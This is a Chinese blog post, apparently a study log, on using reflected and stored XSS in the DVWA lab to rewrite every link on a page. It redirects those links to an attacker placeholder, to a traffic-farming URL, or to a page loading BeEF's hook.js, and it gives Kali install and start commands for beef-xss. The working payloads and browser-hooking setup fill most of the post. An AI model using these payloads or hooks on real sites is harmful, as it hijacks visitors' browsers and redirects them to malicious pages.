XSS篡改网页链接学习记录

最新推荐文章于 2023-12-08 17:17:10 发布
最新推荐文章于 2023-12-08 17:17:10 发布
阅读量742 收藏 1
点赞数
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50597969/article/details/115733980
版权

XSS篡改网页链接学习记录

JS代码讲解

window.onload 当窗口加载时,执行匿名函数。

使用for循环遍历所有获得的链接a标签。

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
 //获取a标签,由于页面不一定只有一个a标签,link也可是个数组
for(j=0;j<link.length;j++){
link[j].href="http://attacker-site.com/";}//替换为其他URL
}

</script>

XSS篡改链接

将篡改代码注入到对应的xss位置,以dvwa的反射型xss为例。
在这里插入图片描述
在url中注入一个payload

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="http://attacker-site.com/";}
}

</script>

结果如下👇
在这里插入图片描述
如果将上述代码存储到存储型xss里边那么,这些链接都会被替换掉。有极大的危害性。

篡改链接指向流量URL

重复上述操作


<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="https://www.baidu.com";}//url为需要刷流量的url,以百度为例
}

</script>

这样点击任何链接都会转向被设定的url

以百度为例
在这里插入图片描述
这里就提醒一下,遇到不明网站的链接不要乱点。

篡改链接指向恶意URL

在kali里使用beef 来进行恶意链接的生成,利用hook.js执行其他命令

kali若没有的话,安装命令:
apt install beef-xss
出现部分内容未安装的情况运行下列命令
apt-get update
apt install beef-xss --fix-missing

--------------------------------------------------------------
//systemctl start beef-xss.service  #开启beef 
//systemctl stop beef-xss.service     #关闭beef 
//systemctl restart beef-xss.service  #重启beef

安装完成后在终端输入👇
beef-xss
接着会让你设置一个密码(初始用户名为beef

启动服务后,开启apache
进入到/var/www/html文件夹下查看index.html中的

<script src="http://ip:端口/hook.js"></script> 
//修改ip为虚拟机的ip并保存

接下来在反射型xss界面get提交

<script>
window.onload = function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="上边的ip/index.html";}
}

</script>

然后去访问这个链接
就可以在kali中的beef的网页中左栏会出现访问那个url的ip
类似这样👇 可以看到对应的信息以及一些可以执行的命令
在这里插入图片描述

T0mrvvi1b3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
基于XSS网页篡改网页劫持,网页钓鱼
qq_40334963的博客
11-04 6083
基于XSS网页篡改网页劫持,网页钓鱼 192.168.80.174服务器上存在漏洞页面xss.php 192.168.80.160服务器上有调用的js xss.php: <?php $op = empty($_GET['op']) ? 'Not entered' : $_GET['op']; echo $op; ?> 浏览器地址栏构建简单的反射型xss判断是否存在xss htt...
【安全】P 4-3 XSS篡改网页
Z_David_Z的博客
02-17 275
目录0X01 JS代码讲解0X02 XSS篡改0X03 篡改指向不良URL0X04 篡改指向恶意URL 0X01 JS代码讲解 window.onload 当窗口加载时,执行匿名函数。 使用for循环遍历所有获得的链a标签。 <script> window.onload = function() { var link=document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) { link[
XSS漏洞利用手段/篡改实战/beef生成恶意网页
ChenD的学习笔记
10-10 1176
XSS篡改网页,beef生成恶意脚本,搭建恶意网页,劫持目标主机
XSS篡改网页
qq_43776408的博客
07-27 1336
JS代码讲解 第一行字面意思 windows:窗口 onload:加载 先把a标签内容都存到link中 然后把a标签的链都改为其他URL XSS篡改 把代码全复制到XSS反射框框中 然后你随便点底下某一个链 然后查看源代码 发现链被替换为attacker了 你也可以用存储型XSS试验 只不过用反射性你在重进一次网站就消失了 而存储型是永久存在 篡改指向流量URL 其实就是将刚才attacker链改为其他的 比如微博链 篡改指向恶意URL 需要用到kali的beef ...
XSS个人学习网页篡改
最新发布
qq_57774303的博客
12-08 160
注意如果想要输入的xss语句成功反弹到beef-xss上就必须在kali的攻击机上的浏览器访问八个页面进行语句的插入。由此可知 kali机器的ip地址是192.168.56.129。输入要克隆的站点地址 如图所示是一个 我们教学的地址。现在我们将链修改一下,看是否会成功,发现不能输入了 去控制台更改编写的长度。用beef-xss生成恶意的链。如图所示,我们的替换取得了成功。setroolkit伪造网站。我们看到了用户的账户和密码。这是XSS篡改的代码。启动setrookit。
Web应用安全:XSS篡改页面(实验).docx
06-19
Web应用安全:XSS篡改页面(实验).docx
XSS.zip_XSS_c xss
09-24
1. **反射型XSS(Non-Persistent XSS)**:也称为非持久性XSS,攻击代码包含在URL中,当用户点击链或通过其他方式访问含有恶意代码的URL时,浏览器立即执行该脚本。 2. **存储型XSS(Persistent XSS)**:又称...
安全测试学习笔记.pdf
05-28
Session是跟踪用户状态的重要手段,但存在被劫持或篡改的风险。Session数据可以存储在cookie、URL参数或服务器端。存储在cookie中时应加密,且SessionID需要具有足够的随机性和复杂度,以减少被猜测的可能性。登录...
网页浏览器Java课程设计
06-11
网页浏览器Java课程设计】是针对Java编程语言的一次实践性教学活动,旨在让学生通过实际开发一个基础的网页浏览器来理解和掌握相关技术。这个课程设计不仅涵盖了Java编程的基础,还涉及到了网络通信、多线程、GUI...
Python-一个基于burp的反射型xss检测插件
08-10
反射型XSSXSS攻击的一种类型,它发生在用户通过恶意链、电子邮件或表单输入触发含有恶意代码的URL时。这些代码在浏览器中执行,可能导致敏感数据泄露、会话劫持或其他恶意行为。这个插件的目的是帮助安全专业...
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6575
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
Web安全系列(一):XSS 攻击基础及原理
2301_77472496的博客
04-23 195
XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过HTML 注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。在这种行为最初出现之时,所有的演示案例全是跨域行为,所以叫做 “跨站脚本时至今日,随着Web 端功能的复杂化,应用化,是否跨站已经不重要了,但 XSS 这个名字却一直保留下来。
XSS漏洞,通过XSS实现网页挂马
qq_2411772106的博客
02-11 2168
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。
XSS攻击---不得不防的网站安全漏洞
qq_37502042的博客
08-19 538
日常vlog。近期公司参与了一次网络安全大检查。手上有个项目被检测出存在XSS攻击漏洞,解决漏洞的同时,借此机会分享一下关于XSS攻击的一些学习总结。
自动刷新页面完成一些刷时长的学习
12-23 1万+
1.打开谷歌浏览器 亲测谷歌浏览器可以,但是win10自带的IE浏览器不行。 2.进入学习网页,登录自己的账号 (不再附图) 3.按F12进入控制台 4.点击console在下方输入以下代码,按回车 timeout=prompt("Set timeout (Second):"); count=0 current=location.href; if(timeout>0) setTimeo...
XSS漏洞利用/setookit制作克隆网站/看完必会
ChenD的学习笔记
10-11 701
kali setookie克隆网页XSS漏洞跳转到克隆网页,获取用户名与密码
spring boot 2.x解决反射性xss
虫二
07-22 1771
spring boot 2.x解决反射性xss
Web安全之XSS攻防
热门推荐
Hei, Welcome To vickie's Blog,Good Good Study, Day Day Up ~
04-18 4万+
Web安全之XSS攻防 1. XSS的定义 2. XSS的原理 3. XSS攻击方式 4. XSS防御措施 5.一个简单的XSS攻击演示
下载有xss漏洞网页源码
07-07
对于下载含有XSS漏洞的网页源码,首先要明确XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码,使用户在浏览网页时受到攻击。 为了下载含有XSS漏洞的网页源码,我们可以按照以下步骤操作: 1. 确定目标网页:首先,需要明确要下载的网页具有XSS漏洞。通常,这需要通过漏洞扫描工具或者手动分析目标网站的源码来判断。 2. 搭建测试环境:为了避免网站的实际访问影响到我们的操作,我们可以搭建本地测试环境。使用Web服务器软件(如Apache、Nginx等)和相应的网页源码托管目录,搭建一个本地网站。 3. 复制目标网页:在搭建的本地测试环境中,通过浏览器访问目标网页,并将其完整的HTML源码复制下来。 4. 编辑源码:使用文本编辑器打开复制的HTML源码文件,并进行相关修改。由于涉及到安全漏洞,建议仅用于学习、研究和测试目的,并遵守法律法规。 5. 保存并访问:保存修改后的源码文件,并重新启动搭建的本地测试环境。通过浏览器访问本地测试环境中的网页,即可下载含有XSS漏洞的网页源码。 需要提醒的是,下载、分析和利用网页源码是一个需谨慎对待的行为。未经授权或滥用此技术可能会导致法律责任。因此,在进行任何相关活动之前,请确保了解相关法律法规,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值